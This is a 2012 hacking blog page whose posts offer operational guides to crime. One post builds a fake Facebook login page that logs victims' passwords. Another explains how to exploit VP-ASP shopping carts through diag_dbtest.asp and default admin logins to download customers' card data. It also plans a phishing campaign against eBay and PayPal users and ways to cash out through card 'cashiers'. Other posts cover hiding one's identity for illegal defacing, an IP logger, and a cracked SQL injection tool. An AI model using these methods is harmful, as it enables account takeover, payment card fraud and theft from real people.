Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Best4Hack

Best4Hack is the site where you can learn Ethical Hacking and Cracking get latest Tips and Tricks free Hacked and Cracked Software get SEO.

Showing posts with label For Newbies What Is hacking. Show all posts
Showing posts with label For Newbies What Is hacking. Show all posts

Friday, 14 December 2012

The Hackers Underground Ebooks Compilation By Prince




This eBook is the best one i have every read in my life as a beginner in Hacking. If you are beginner then seriously there is not any eBook for you this is what you need to read from first page to last. You will learn all basic techniques about Hacking in real life. You will learn email hacking, computer hacking, wireless hacking, website hacking, Linux hacking, Windows hacking and much more. So this eBook is like the first step into Hacking World. If you really wish to get into Hacking then simply just download the eBook the link is posted at the last of this post.

BOOK DESCRIPTION
The information given in this underground handbook will put you into a hacker's mindset and teach you all of the hacker's secret ways. The Hacker's Underground Handbook is for the people out there that wish to get into the the amazing field of hacking. It introduces you to many topics like programming, Linux, password cracking, network hacking, Windows hacking, wireless hacking, web hacking and malware. Each topic is introduced with an easy to follow, real-world example. The book is written in simple language and assumes the reader is a complete beginner.


The Hacker's Underground Handbook: DOWNLOAD



Saturday, 8 December 2012

Stay Anonymous (Secure) online 2012 Using SSH Tunneling + TOR (NOOB Friendly)





Hi all users, Prince Mahen here. I know most of you are scare before hacking/defacing a website without taking precautions. Because most of you may not be having a good VPN which is paid and secure enough to do illegal stuffs and if you user free VPN you'll easily get caught. So today we will teach you how to stay completely secure (anonymous) without using any VPN. So lets get started.

Here is some drawbacks using free VPN :

They are slow and contain ads in most of the cases.
The provide limited number of proxies.
They are insecure as they store logs.
Logs are easily Traceable.
They are not reliable because even when they say they do not store logs,they do it


Tool that we'll use is this TUT :
TOR Browser Download here
PuTTY Download here

Now open PuTTY and in the category, choose Session and fill the boxes as mentioned below :


Host Name : shellmix.com

Port : 30

Connection Type : SSH



And Click Open, a black window will appear.Enter the Username and password as "newuser" (Password appears blank but its typed).

1. Now enter a Login name and a password.

2. Enter another password For MySQL Database.

3. Enter Email Address.

4. Choose Editor and Enter pico.

Language : us
Vhost : shell
HDD : Enter hdd1 or hdd2

Now press Enter to Continue.Now your shell account is ready, make sure you remember the username and that password you created.


SSH TUNNELING

Now we're going to do SSH tunneling, reopen the PuTTY and follow the steps below to make it work :

Host : shellmix.com.
Port : 22.
Now in category on the left,choose SSH.
Expand it and select Tunnel.
Destination : Dynamic.
Port : Any random port. (Example : 4545)

Click Add and finally click on Open. Enter the Login name and Password that you created earlier and leave this window open.




Now open TOR

1. Click Firefox > Options > Advanced > Network > Settings
2. Click Manual Proxy Configuration

Socks Host : 127.0.0.1
Port : 4545 (The port you used earlier in PuTTY)

3. Click on OK.

SSH Tunnel Is Ready. Go to http://www.ip2location.com and verify your fake IP


Stay Anonymous 



Thursday, 29 November 2012

Hack a Facebook Account Using a Fake login Page



Hi guys , me again .. PrinceMahen .. Today gonna show u the most simplest way to hack Facebook Account.. 

1. First a fall you need a fake login page for facebook (fake.html),and a Php script to redirect and capture the victims passwords (login.php), You can download both the files from Here

2. After you download the files, Open login.php,with a note pad and search for the term www.enteryoursite.com and replace it with the site address where you want the victim to be redirected ,finally save it






Note : This a very important step redirect the victim to a proper site other wise the victim will get suspicious .In our case we are making fake face book login page so its better to redirect the victim to www.facebook.com/careers

4. Now create an account at Free web hosting site like 110mb.com , T35.com or ripway.com


5. Now upload both the files (fake.html , login.php ) to your hosting account and send the fake.html(fake facbook login page) link to your victim



Example :-
www.yoursite.110 mb.com/fake.html




6. Now when the victim enters all his credentials, like login name and password in our fake login page and when he clicks login He will be redirected to site which we did in step 3



7. Now to see the victims id ,password, login to your hosting account "110mb.com " where you will see a new file "log.txt" .Open it to see the victims user id and the password

This is a simple but a very effective method to Hack face book accounts .If you have any doubts please feel free to comment !!

Saturday, 24 November 2012

Create Direct Link for Your Files




Hi all users, how are you. PrinceMahen here..  Today i m  going to tell you how to upload you files at maximum speed and create/generate a direct link for it. Most of time we need to upload our files and share with some peoples sometime with our users and they don't have patient to wait 60 or 30 seconds and downloading stuffs in lowest speed with no resume capability. Sometime some sites like mediafire, ifile.it is a good option but they have annoying ads or waiting time, but I assure you that this site is very cool and very simple to use. You just nee to click upload button and that' it. You can upload your file 1024mb file at a time and they allows split archives also. So without losing a single moment lets get started.

Follow the steps below to create your direct link :

1. First of all go to this cool website.

2. Register an account for you.

3. Start uploading and they will create a direct link for your file, mean no CAPTCHA no waiting etc.




HOW TO HACK A CREDIT CARD !!!!!!!




HELLO WORLD IM DAVIDREX IS HERE FOR A NICE AND USEFUL TRICKS:
LETS START.......


THIS TUTORIAL IS DIVIDED IN TWO PARTS.
INTRODUCTION INTO CREDIT CARDS
CREDIT CARD HACKING

NOTE: HACKING CREDIT CARDS IS AN ILLEGAL ACT, THIS IS ONLY INFORMATIONAL POST AND WE NOT RESPONSIBLE FOR ANY ACTIONS DONE BY YOU AFTER READING THIS TUTORIAL. THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

LETS START WITH SOME EASY TERMS.

WHAT IS CREDIT CARD ?

CREDIT CARDS ARE OF TWO TYPES:
DEBIT CARD
CREDIT CARD
1. DEBIT MEANS U HAVE A SUM OF AMOUNT IN IT AND U CAN USE THEM.
2. CREDIT MEANS U HAVE A CREDIT LINE LIMIT LIKE OF $10000 AND U CAN USE THEM AND BY THE END OF MONTH PAY IT TO BANK.

TO USE A CREDIT CARD ON INTERNET U JUST NOT NEED CC NUMBER AND EXPIRY BUT U NEED MANY INFO LIKE :
FIRST NAME
LAST NAME
ADDRESS
CITY
STATE
ZIP
COUNTRY
PHONE
CC NUMBER
EXPIRY
CVV2 ( THIS IS 3DIGIT SECURITY CODE ON BACKSIDE AFTER SIGNATURE PANEL )
IF YOU GET THAT INFO YOU CAN USE THAT TO BUY ANY THING ON INTERNET, LIKE SOFTWARE LICENSE, PORN SITE MEMBERSHIP, PROXY MEMBERSHIP, OR ANY THING (ONLINE SERVICES USUALLY, LIKE WEBHOSTING, DOMAINS).

IF U WANT TO MAKE MONEY $ THROUGH HACKING THEN YOU NEED TO BE VERY LUCKY... YOU NEED TO HAVE A EXACT BANK AND BIN TO CASH THAT CREDIT CARD THROUGH ATM MACHINES.

LET ME EXPLAIN HOW ?

FIRST STUDY SOME SIMPLE TERMS.

BINS = FIRST 6 DIGIT OF EVERY CREDIT CARD IS CALLED " BIN " (FOR EXAMPLE CC NUMBER IS : 4121638430101157 THEN ITS BIN IS " 412163 "), I HOPE THIS IS EASY TO UNDERSTAND.

NOW THE QUESTION IS HOW TO MAKE MONEY THROUGH CREDIT CARDS. ITS STRANGE..., WELL YOU CANT DO THAT, BUT THERE IS SPECIFIC PERSONS IN WORLD WHO CAN DO THAT. THEY CALL THEM SELVES " CASHIERS ". YOU CAN TAKE SOME TIME TO FIND A RELIABLE CASHIERS.

NOW THE QUESTION IS EVERY BANK CREDIT CARDS ARE CASHABLE AND EVERY BIN IS CASHABLE? LIKE CITIBANK, BANK OF AMERICA , MBNA .. ARE ALL BANKS ARE CASHABLES ? WELL ANSWER IS " NO ". IF U KNOW SOME THING, A LITTLE THING ABOUT BANKING SYSTEM, HAVE U EVER HEARD WHAT IS ATM MACHINES? WHERE U WITHDRAW UR CASH BY PUTTING UR CARD IN.
EVERY BANK DON'T HAVE ATM, EVERY BANK DON'T SUPPORT ATM MACHINES CASHOUT. ONLY FEW BANKS SUPPORT WITH THEIR FEW BINS (AS U KNOW BIN IS FIRST 6 DIGIT OF ANY CREDIT / DEBIT CARD NUMBER), FOR SUPPOSE BANK OF AMERICA. THAT BANK NOT HAVE ONLY 1 BIN, THAT BANK IS ASSIGNED LIKE, 412345 412370 ARE UR BINS U CAN MAKE CREDIT CARDS ON THEM. SO BANK DIVIDE THE COUNTRY CITI LOCATION WISE, LIKE FROM 412345 - 412360 IS FOR AMERICANS, AFTER THAT FOR OUTSIDERS AND LIKE THIS. I HOPE U UNDERSTAND. SO ALL BINS OF THE SAME BANK ARE EVEN NOT CASHABLE, LIKE FOR SUPPOSE THEY SUPPORT ATM IN NEW YORK AND NOT IN CALIFORNIA, SO LIKE THE BINS OF CALIFORNIA OF SAME BANK WILL BE UNCASHABLE. SO ALWAYS MAKE SURE THAT THE BINS AND BANKS ARE 100% CASHABLE IN MARKET BY MANY CASHIERS.

BE SURE CASHIERS ARE LEGIT, BECAUSE MANY CASHIERS R THERE WHICH TAKE YOUR CREDIT CARD AND RIP U OFF AND DON'T SEND YOUR 50% SHARE BACK.
YOU CAN ALSO FIND SOME CASHIERS ON MIRC *( /SERVER IRC.UNIXIRC.NET:6667 ) CHANNEL : #CASHOUT, #CCPOWER

WELL, CHECK THE WEBSITE WHERE U HAVE LIST OF BINS AND BANKS MOSTLY 101% CASHABLE. IF U GET THE CREDIT CARD OF THE SAME BANK WITH SAME BIN, THEN U CAN CASHOUT OTHERWISE NOT . REMEMBER FOR USING CREDIT CARD ON INTERNET U DON'T NEED PIN ( 4 WORDS PASSWORD WHICH U ENTER IN ATM MACHINE ), BUT FOR CASHOUT U NEED. YOU CAN GET PINS ONLY BY 2ND METHOD OF HACKING WHICH I STILL NOT POST BUT I WILL. FIRST METHOD OF SQL INJECTION AND SHOPADMIN HACKING DON'T PROVIDE WITH PINS, IT ONLY GIVE CC NUMB CVV2 AND OTHER INFO WHICH USUALLY NEED FOR SHOPPING NOT FOR CASHING.

CREDIT CARD HACKING

CC (CREDIT CARDS) CAN BE HACKED BY TWO WAYS:
CREDIT CARD SCAMS ( USUALLY USED FOR EARNING MONEY , SOME TIMES FOR SHOPPING )
CREDIT CARD SHOPADMIN HACKING ( JUST FOR FUN, KNOWLEDGE, SHOPPING ON INTERNET )
1. SHOPADMIN HACKING

THIS METHOD IS USED FOR TESTING THE KNOWLEDGE OR FOR GETTING THE CREDIT CARD FOR SHOPPING ON INTERNET, OR FOR FUN, OR ANY WAY BUT NOT FOR CASHING ( BECAUSE THIS METHOD DON'T GIVE PIN - 4 DIGIT PASSCODE ) ONLY GIVES CC NUMB , CVV2 AND OTHER BASIC INFO.

SHOPADMINS ARE OF DIFFERENT COMPANIES, LIKE: VP-ASP , X CART, ETC. THIS TUTORIAL IS FOR HACKING VP-ASP SHOP.

I HOPE U SEEN WHENEVER U TRY TO BUY SOME THING ON INTERNET WITH CC, THEY SHOW U A WELL PROGRAMMED FORM, VERY SECURE. THEY ARE CARTS, LIKE VP-ASP XCARTS. SPECIFIC SITES ARE NOT HACKED, BUT CARTS ARE HACKED.

BELOW I'M POSTING TUTORIAL TO HACK VP ASP CART. NOW EVERY SITE WHICH USE THAT CART CAN BE HACKED, AND THROUGH THEIR *MDB FILE U CAN GET THEIR CLIENTS 'CREDIT CARD DETAILS', AND ALSO LOGIN NAME AND PASSWORD OF THEIR ADMIN AREA, AND ALL OTHER INFO OF CLIENTS AND COMAPNY SECRETS.

LETS START:

TYPE: VP-ASP SHOPPING CART
VERSION: 5.00

HOW TO FIND VP-ASP 5.00 SITES?

FINDING VP-ASP 5.00 SITES IS SO SIMPLE...

1. GO TO GOOGLE.COM AND TYPE: VP-ASP SHOPPING CART 5.00
2. YOU WILL FIND MANY WEBSITES WITH VP-ASP 5.00 CART SOFTWARE INSTALLED

NOW LET'S GO TO THE EXPLOIT..

THE PAGE WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPDISPLAYCATEGORIES.ASP
THE EXPLOIT IS: DIAG_DBTEST.ASP
NOW YOU NEED TO DO THIS: ****://***.VICTIM.COM/SHOP/DIAG_DBTEST.ASP

A PAGE WILL APPEAR CONTAIN THOSE:
XDATABASE
SHOPPING140
XDBLOCATION
RESX
XDATABASETYPEXEMAILXEMAIL NAMEXEMAILSUBJECTXEMAILSY STEMXEMAILTYPEXORDERNUMBE R
EXAMPLE:

THE MOST IMPORTANT THING HERE IS XDATABASE
XDATABASE: SHOPPING140

OK, NOW THE URL WILL BE LIKE THIS: ****://***.VICTIM.COM/SHOP/SHOPPING140.MDB

IF YOU DIDN'T DOWNLOAD THE DATABASE, TRY THIS WHILE THERE IS DBLOCATION:
XDBLOCATION
RESX
THE URL WILL BE: ****://***.VICTIM.COM/SHOP/RESX/SHOPPING140.MDB

IF U SEE THE ERROR MESSAGE YOU HAVE TO TRY THIS :
****://***.VICTIM.COM/SHOP/SHOPPING500.MDB

DOWNLOAD THE MDB FILE AND YOU SHOULD BE ABLE TO OPEN IT WITH ANY MDB FILE VIEWER, YOU SHOULD BE ABLE TO FIND ONE AT DOWNLOAD.COM, OR USE MS OFFICE ACCESS.
INSIDE YOU SHOULD BE ABLE TO FIND CREDIT CARD INFORMATION, AND YOU SHOULD EVEN BE ABLE TO FIND THE ADMIN USERNAME AND PASSWORD FOR THE WEBSITE.

THE ADMIN LOGIN PAGE IS USUALLY LOCATED HERE: ****://***.VICTIM.COM/SHOP/SHOPADMIN.ASP

IF YOU CANNOT FIND THE ADMIN USERNAME AND PASSWORD IN THE MDB FILE OR YOU CAN BUT IT IS INCORRECT, OR YOU CANNOT FIND THE MDB FILE AT ALL, THEN TRY TO FIND THE ADMIN LOGIN PAGE AND ENTER THE DEFAULT PASSWORDS WHICH ARE:
USERNAME: ADMIN
PASSWORD: ADMIN
OR
USERNAME: VPASP
PASSWORD: VPASP


2. HACKING THROUGH SCAMS

THIS METHOD IS USUALLY USED TO HACK FOR EARNING MONEY. WHAT HAPPENS IN THIS METHOD IS YOU CREATE A CLONE PAGE.

TARGET: ITS BASICALLY EBAY.COM OR PAYPAL.COM FOR GENERAL CREDIT CARDS, OR IF U WANT TO TARGET ANY SPECIFIC CASHABLE BANK LIKE REGIONBANK.COM THEN U HAVE TO CREATE A CLONE PAGE FOR THAT BANK.

WHAT IS EBAY.COM?

ITS A SHOPPING SITE WORLD WIDE WHICH IS USED BY MANY OF BILLION PEOPLE WHICH USE THEIR CREDIT CARDS ON EBAY. WHAT YOU DO MAKE A SIMILAR PAGE SAME AS EBAY AND UPLOAD IT ON SOME HOSTING WHICH DON'T HAVE ANY LAW RESTRICTIONS, TRY TO FIND HOSTING IN EUROPE THEY WILL MAKE YOUR SCAM UP FOR LONG TIME, AND EMAIL THE USERS OF EBAY.

HOW TO GET THE EMAILS OF THEIR USERS?

GO TO GOOGLE.COM AND TYPE "EMAIL HARVESTOR" OR ANY EMAIL SPIDER AND SEARCH FOR EBAY BUYERS AND EBAY SELLERS AND U WILL GET LONG LIST. THAT LIST IS NOT ACCURATE BUT OUT OF 1000 ATLEAST 1 EMAIL WOULD BE VALID. ATLEAST YOU WILL GET SOME TIME.

WELL U CREATE A CLONE PAGE OF EBAY, AND MAIL THE LIST U CREATE FROM SPIDER WITH MESSAGE, LIKE "YOUR ACCOUNT HAS BEEN HACKED" OR ANY REASON THAT LOOKS PROFESSIONAL, AND ASK THEM TO VISIT THE LINK BELOW AND ENTER YOUR INFO BILLING, AND THE SCAM PAGE HAVE PROGRAMMING WHEN THEY ENTER THEIR INFO IT COMES DIRECTLY TO YOUR EMAIL.
IN THE FORM PAGE U HAVE PIN REQUIRED SO U ALSO GET THE PIN NUMBER THROUGH WHICH U CAN CASH THROUGH ATM ..

NOW IF U RUN EBAY SCAM OR PAYPAL SCAM, ITS UP TO YOUR LUCK WHO'S YOUR VICTIM. A CLIENT OF BANK OF AMERICA OR OF CITIBANK OR OF REGION, ITS ABOUT LUCK, MAYBE U GET CASHABLE, MAY BE U DON'T ITS JUST LUCK, NOTHING ELSE.

SEARCH ON GOOGLE TO DOWNLOAD A SCAM SITE AND STUDY IT !

AFTER YOU CREATE YOUR SCAM SITE, JUST FIND SOME EMAIL HARVESTOR OR SPIDER FROM INTERNET (DOWNLOAD GOOD ONE AT BULK EMAIL SOFTWARE SUPERSTORE - EMAIL MARKETING INTERNET ADVERTISING) AND CREATE A GOOD EMAIL LIST.

AND YOU NEED TO FIND A MAILER (MASS SENDING MAILER) WHICH SEND MASS - EMAILS TO ALL EMAILS WITH THE MESSAGE OF UPDATING THEIR ACCOUNT ON UR SCAM PAGE ). IN FROM TO, USE EMAIL EBAY@REPLY3.EBAY.COM AND IN SUBJECT USE : EBAY - UPDATE YOUR EBAY ACCOUNT AND IN NAME USE EBAY

SOME INSTRUCTIONS:

1. MAKE SURE YOUR HOSTING REMAINS UP OR THE LINK IN THE EMAIL U WILL SEND, AND WHEN YOUR VICTIM EMAILS VISIT IT, IT WILL SHOW PAGE CANNOT BE DISPLAYED, AND YOUR PLAN WILL BE FAILED.
2. HARDEST POINT IS TO FIND HOSTING WHICH REMAINS UP IN SCAM. EVEN I DON'T FIND IT EASILY, ITS VERY VERY HARD PART.
3. MAYBE U HAVE CONTACTS WITH SOMEONE WHO OWN HOSTING COMPANY AND CO LOCATIONS OR DEDICATED HE CAN HIDE YOUR SCAM IN SOME OF DEDICATED WITHOUT RESTRICTIONS.
4. FINDING A GOOD EMAIL LIST (GOOD MEANS = ACTUALLY USERS)
5. YOUR MASS MAILING SOFTWARE LAND THE EMAILS IN INBOX OF USERS.

Wednesday, 21 November 2012

GET IP ADRESS OF YOUR FRIENDS USING PHP(1000 % WORKING)


HELLO DAVIDREX BACK GOING TO TEACH YOU HOW TO GET IP ADRESS OF SOMENONE USING PHP ............ (SOOO SIMPLE)
# ONLY 3 STEPS

1) COPY THE CODE BELOW AND PASTE IT IN THE NOTEPAD(code must be the same) :


<?php
$ip = $_SERVER['REMOTE_ADDR'];
$open = fopen('logs.html' , 'a+');
$fwrite = fwrite($open , $ip.'<hr />');
$fclose = fclose($open);
header('Location: https://www.facebook.com/best4hack');
?>

2) NOW SAVE THAT AS INDEX.PHP. 

3) THEN GO TO ANY FREEE WEBHOSTING SITE AND SIGNUP.

4) GO TO FILES > FILE MANAGER 1 > AND UPLOAD THE CODE(INDEX.PHP) THAT U SAVED EARLIER....

5) NOW SEND THAT DOMAIN THAT YOU REGISTER AND UPLOAD THE CODE TO YOUR FRIEND... IF HE CLICK THAT, AUTOMATICLLY U WILL GET THE IP ADRESS IN THE LOGS HTML.

#HAVE ANY PROBLEM FEEL FREE TO COMMENT AND ASK .... GOOD BAI 
VISIT OUR BLOG DAILY....

Tuesday, 20 November 2012

The best hacking tools collection



Prince Mahen again ... Here, i have collect some best hacking tools for you. That are listed below:

Nessus
The “Nessus” Project aims to provide to the internet community a free, powerful, up-to-date and easy to use remote security scanner for Linux, BSD, Solaris, and other flavors of Unix.

Ethereal
Ethereal is a free network protocol analyzer for Unix and Windows. Ethereal has several powerful features, including a rich display filter language and the ability to view the reconstructed stream of a TCP session.

Snort
Snort is an open source network intrusion detection system, capable of performing real-time traffic analysis and packet logging on IP networks.

Netcat
Netcat has been dubbed the network swiss army knife. It is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol
TCPdump
TCPdump is the most used network sniffer/analyzer for UNIX. TCPTrace analyzes the dump file format generated by TCPdump and other applications.

Hping
Hping is a command-line oriented TCP/IP packet assembler/analyzer, kind of like the “ping” program (but with a lot of extensions).

DNSiff
DNSiff is a collection of tools for network auditing and penetration testing. dsniff, filesnarf, mailsnarf, msgsnarf, urlsnarf, and webspy passively monitor a network for interesting data (passwords, e-mail, files, etc.).

GFI LANguard
GFI LANguard Network Security Scanner (N.S.S.) automatically scans your entire network, IP by IP, and plays the devil’s advocate alerting you to security vulnerabilities.

Ettercap
>Ettercap is a multipurpose sniffer/interceptor/logger for switched LAN. It supports active and passive dissection of many protocols (even ciphered ones)and includes many feature for network and host analysis.

Nikto
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 2500 potentially dangerous files/CGIs, versions on over 375 servers, and version specific problems on over 230 servers.

John the Ripper
John the Ripper is a fast password cracker, currently available for many flavors of Unix.

OpenSSH
OpenSSH is a FREE version of the SSH protocol suite of network connectivity tools, which encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks.

TripWire
Tripwire is a tool that can be used for data and program integrity assurance.

Kismet
Kismet is an 802.11 wireless network sniffer – this is different from a normal network sniffer (such as Ethereal or tcpdump) because it separates and identifies different wireless networks in the area.

NetFilter
NetFilter and iptables are the framework inside the Linux 2.4.x kernel which enables packet filtering, network address translation (NAT) and other packetmangling.

IP Filter
IP Filter is a software package that can be used to provide network address translation (NAT) or firewall services.

pf
OpenBSD Packet Filter

fport
fport identifys all open TCP/IP and UDP ports and maps them to the owning application.

SAINT
SAINT network vulnerability assessment scanner detects vulnerabilities in your network’s security before they can be exploited.

OpenPGP
OpenPGP is a non-proprietary protocol for encrypting email using public key cryptography. It is based on PGP as originally developed by Phil Zimmermann.

Update:  
Metasploit
Metasploit provides useful information to people who perform penetration testing, IDS signature development, and exploit research. This project was created to provide information on exploit techniques and to create a useful resource for exploit developers and security professionals. The tools and information on this site are provided for legal security research and testing purposes only.

Fast-track 
Fast-Track is a python based open source security tool aimed at helping penetration testers conduct highly advanced and time consuming attacks in a more methodical and automated way. Fast-Track is now included in Backtrack version 3 onwards under the Backtrack --> Penetration category. In this talk given at Shmoocon 2009, the author of Fast-Track Dave Kennedy runs us through a primer on the tool and demonstrates 7 different scenarios in which he breaks into systems using the Fast-Track tool. These scenarios include automated SQL injection, MSSQL brute forcing, Query string pwnage, Exploit rewrite, Destroying the Client and Autopwnage. 


If you know more, share with me via comment:)

Web Interaction Using Python

Its me again , PrinceMahen ... :)

Introduction


In a number of the HTS programming missions you are asked to interact with the site from a program that you have written, as opposed to using a webbrowser. There are plenty of other applications for web interaction, however. I have written a few python scripts to download various data from websites (e.g. http://python.pastebin.com/f268e6319 )

I will cover two ways of getting data from a website (and in fact, sending data too). If there are any problems with the article, leave a comment.

All examples have been written in Python 2.6. There are quite a few differences between 2.6 and 3.0, but the only ones that should apply in the code snippets in this article involve the print function.

In Python 2.6 a simple hello world is this:
CODE : 


print "Hello World"

In Python 3.0 it looks like this:
CODE : 


print("Hello World")


It's a good idea, and I will switch to 3.0 when it is finally worn in, but for the moment I'm sticking with 2.6.
If there are problems with any of the code running as 3.0, try using the 2to3 script (It came preinstalled with Xubuntu for me.. not sure about on windows etc).

Anyway, now that's all covered, on with the article.

The Url Libraries


First of all we will start with a tutorial on the URL libraries. These are urllib and urllib2.

Let's immediately get started with some code.
CODE : 


import urllib2
url = "http://example.com"
website = urllib2.urlopen(url)
print website.read()


Pretty simple code really, and for a lot of things it's all you need to know. It fetches the website "http://example.com" and stores the data as an instance on which we use the read() function to return the data retrieved from the site. Here are the functions:
instance.read() This returns the data retrieved from the site.
instance.info() This returns the HTTP message from the server, it has a lot of useful information in it including cookie info and server type.
instance.geturl() Returns the URL that was requested - seems pointless but we'll cover it in a second and you'll see why there is a point.
instance.getcode() Returns the HTTP status code. (e.g. 404, 200)

It's worth messing around with those a bit, rather than just taking my word for what they do.
I'll now just show a use of the geturl() function:
CODE : 


import urllib2
url = "http://google.com" # After google, try 'http://example.com'
website = urllib2.urlopen(url)
if url == website.geturl():
print "Website not redirected."
else:
print "Website redirected you."


Why you'd want to do that, I don't know, but there's bound to be a use for it sometime. But that is one application of the geturl() function anyway.

Let's do a HTTP POST request now. They're pretty easy really, but can look a little complicated, so don't worry.
Before you look at the code, you might want to set up a server (or get some webspace) so you can test this out. A little PHP script like below will do the trick:
CODE : 


<?php
echo $_POST['test'];
?>


And before anyone says anything about XSS - get lost - it's a testpage that will be up for 10 minutes on a server that noone cares about. But if you really are that bothered, you can use strip_tags() around that. (I say this because I can tell there'll be someone who will try and pipe up a clever comment).

Now then, we'll be introducing a new module for this (though it isn't strictly necessary, it's the best way I reckon). I will import the single function as we don't need any other functions from the module.

Okay, let's go:
CODE : 


import urllib2
from urllib import urlencode # new module and function

url = "http://localhost/test.php"
data = {'test':'lolwut'}
# you can add as much info as you want to this dictionary
# "test" is the label for the data, so that PHP script above
# should display "lolwut".

encoded_data = urlencode(data)
# remember that this is from that imported module, normally you'd
# use this: urllib.urlencode(data) if you used a normal import.

website = urllib2.urlopen(url, encoded_data)
print website.read() # That was pretty easy, right?


Pretty straightforward, right?
Let's go onto HTTP Basic Authentication. This is more tricky. Here's the skeleton code for opening more advanced things, including HTTP authentication.
CODE : 


import urllib2

url = "http://example.com"

openerDirective1 = ...
openerDirective2 = ...

opener = urllib2.build_opener(openerDirective1, openerDirective2)

urllib2.install_opener(opener)

website = urllib2.urlopen(url)


Okay, that's a lot more complicated. Note the "openerDirective"s. They are basically a way of adding headers to the urlopen requests.
You can have numerous opener directives, or just the one. You build them into an opener using the build_opener() function then install it, using install_opener(). After that, you can request a site and it will include the headers that you have specified.

Let's look at creating a HTTP Basic Authentication header.

CODE : 


authDirective = urllib2.HTTPBasicAuthHandler()
realm = "Webmail"
url = "http://example.com/webmail/"
username = "leethaxxer"
password = "letmein"
authDirective.add_password(realm, url, username, password)


Then, we just build the opener and install it like we did in the skeleton code. Here:
CODE : 


opener = urllib2.build_opener(authDirective)
urllib2.install_opener(opener)


I plan to write another article soon about cookies in Python, both as part of CGI and as part of requests with Urllib2.
Now I will move onto sockets and raw HTTP requests, and include cookies in that.

Socket Programming in Python


Socket programming is a really useful thing to learn - it's a must really, especially if you want to learn about security.

Again, we'll get some code out there straight away:
CODE : 


import socket
s = socket.socket()

host = "www.example.com"
port = 80
addr = (host, port)

s.connect(addr)
s.send("Something to send..")
print s.recv(1024)
# 1024 is the buffer size, you don't need to worry about it
# much right now.

s.close()


There we are. We've created a socket, connected to "www.example.com" on port 80 then sent "Something to send.." and received something back, which has been printed out. Then we closed the socket, which isn't strictly necessary - but good practice.

Here's some better stuff to send, however:
CODE : 


GET /index.html HTTP/1.1\r\n
Host: www.example.com\r\n


That's a simple HTTP GET request, asking for "index.html".
Here's a post request:
CODE : 


POST /index.php HTTP/1.1\r\n
Host: www.example.com\r\n
Content-Length: 11\r\n
\r\n
hello=world\r\n


Now let's add a cookie to a HTTP GET:
CODE : 


GET /index.html HTTP/1.1\r\n
Host: www.example.com\r\n
Set-Cookie: hello=world\r\n


There are other socket modes that can be set, this article is a very basic introduction. I would recommend reading this article if you want to learn more: http://www.amk.ca/python/howto/sockets/

Conclusion


Hopefully this article will help you begin to interact with the Internet using Python. It's just the beginning and I will work on follow-up articles. Good luck and thanks for reading.




PrinceMahen

Sunday, 21 October 2012

Havij v1.16 for free download. Cracked.


This tool was  Cracked by Service Manual { AoRE Team }
so credz to them.
After you download pls comment here to show if the tool was good or everything went well.
Thanks
Havij v1.16 Released
Date: 01 May 2012
Havij v1.16 Advanced SQL Injection Tool released. New features of this version are:

Multithreading
Oracle Blind injection method.
Automatic all parameter scan added.
New blind injection method (no more ? char.)
Retry for blind injection.
A new method for tables/columns extraction in mssql blind.
A WAF bypass method for mysql blind.
Getting tables and columns even when can not get current database.
Auto save log.
bugfix: url encode bug fixed.
bugfix: trying time based methods when mssql error based and union based fail.
bugfix: clicking get columns would delete all tables.
bugfix: reseting time based method delay when applying settings.
bugfix: Oracle and PostgreSQL detection

DOWNLOAD = rghost.net/41117550?r=1201
Virustotal scan =  https://www.virustotal.com/file/8b3bf9add68356b4b7141a75c5a314b5713e354d9e696bf344a4f59b1931a0ae/analysis/

Related Posts Plugin for WordPress, Blogger...